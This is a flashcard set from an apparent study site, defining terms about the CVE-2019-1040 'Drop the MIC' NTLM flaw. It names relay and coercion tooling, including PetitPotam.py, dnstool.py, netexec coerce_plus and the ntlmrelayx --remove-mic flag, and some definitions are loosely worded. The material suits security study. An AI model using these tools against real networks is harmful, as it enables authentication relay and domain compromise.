CVE-2019-1040 (Drop the MIC) and NTLM Authentication

0.0(0)
Studied by 0 people
call kaiCall Kai
learnLearn
examPractice Test
spaced repetitionSpaced Repetition
heart puzzleMatch
flashcardsFlashcards
GameKnowt Play
Card Sorting

1/11

flashcard set

Earn XP

Description and Tags

Vocabulary terms and definitions related to the CVE-2019-1040 'Drop the MIC' vulnerability and NTLM relay attack mechanisms.

Last updated 12:34 AM on 5/22/26
Name
Mastery
Learn
Test
Matching
Spaced
Call with Kai

No analytics yet

Send a link to your students to track their progress

12 Terms

1
New cards

MIC (Message Integrity Code)

A signature field added to NTLM AUTHENTICATE messages that cryptographically binds the NEGOTIATE, CHALLENGE, and AUTHENTICATE messages to prevent tampering and relay attacks.

2
New cards

MIC Computation Formula

MIC=HMAC_MD5(SessionBaseKey,NEGOTIATE+CHALLENGE+AUTHENTICATE)MIC = \text{HMAC\_MD5}(\text{SessionBaseKey}, \text{NEGOTIATE} + \text{CHALLENGE} + \text{AUTHENTICATE})

3
New cards

CVE-2019-1040

Also known as "Drop the MIC," a vulnerability where Windows fails to properly validate the MIC's presence or enforcement during NTLM authentication, allowing attackers to strip the MIC and relay messages.

4
New cards

msvAvFlags

A field within the MsvAvFlags AV pair that signals the presence of a MIC; in a "Drop the MIC" attack, this flag is zeroed out to hide the fact that the MIC was removed.

5
New cards

CVE-2019-1040 Flaw 1

The ability to simply remove the MIC field because the server did not properly validate whether the MIC was required or enforced.

6
New cards

CVE-2019-1040 Flaw 2

The ability to strip Sign/Seal flags even when signing is negotiated; because the MIC is removed, the server accepts the authentication without enforcing the signing requirement.

7
New cards

EPA (Extended Protection for Authentication)

A security feature that, when enabled, prevents CVE-2019-1040 attacks from succeeding even on otherwise unpatched targets.

8
New cards

coerce_plus

A module used with netexec to coerce authentication from a target machine, often used in conjunction with attacks like PetitPotam.

9
New cards

dnstool.py

A tool used to add DNS records to a Domain Controller (DC), facilitating NTLM relay attacks by creating a listener host.

10
New cards

PetitPotam.py

A tool used to coerce NTLM authentication from a target to a specified listener.

11
New cards

--remove-mic

An impacket-ntlmrelayx flag used to exploit CVE-2019-1040, allowed for relaying to targets where SMB signing is enabled (e.g., via winrms).

12
New cards

AUTHENTICATE message

The specific NTLM message in the sequence (NEGOTIATE → CHALLENGE → AUTHENTICATE) that contains the Message Integrity Code signature.